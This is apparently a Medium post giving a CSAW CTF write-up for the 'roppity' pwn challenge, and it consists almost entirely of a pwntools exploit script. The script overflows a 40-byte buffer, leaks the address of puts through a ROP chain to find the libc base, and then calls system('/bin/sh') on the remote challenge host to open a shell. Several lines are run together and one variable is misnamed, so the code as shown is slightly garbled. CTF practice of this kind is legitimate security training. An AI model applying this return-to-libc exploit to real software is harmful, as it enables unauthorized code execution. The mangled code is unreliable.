CSAWCTF — PWN — ROPPITY

"A" * 40 + MAIN_ADDR
send("A" * 40 + MAIN_ADDR)
send("A" * 40 + PLT_PUTS + GOT_PUTS + MAIN_ADDR)
send("A" * 40 + LIBC_SYSTEM + LIBC["/bin/sh"])
#!/usr/bin/env pythonfrom pwn import *
import struct
b = ELF("./rop")
context(os="linux", arch="amd64")
libc = ELF("./libc-2.27.so")
r = remote("pwn.chal.csaw.io",5016)
main = p64(b.symbols['main'])
print(r.recv())
r.sendline(fit({40:b.sym.main}))
print(r.recv())
rop = ROP(b)
rop.call(b.sym.puts, [b.got.puts])
rop.call(b.sym.main)
r.sendline(fit({40:rop.chain()}))putsttr=r.recvline(False)
puts = u64(putsttr.ljust(8, "\x00"))
log.info("Puts is at %#x", puts)
__libc_start_main = puts-libc.sym['puts']
libc.address=__libc_start_main
log.info("__libc_start_main address: %#x",libc.address)
rop = ROP(b)
system=libc.sym.system
binsh = next(libc.search("/bin/sh"))
rop.call(system, [binsh])
r.sendline(fit({40:rop.chain()}))
r.interactive()
r.close()
python2 exploit.py

--

--

PARSECT // IT Security Enthusiast // STOICISM // KEEP DO SOMETHING LEGAL

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store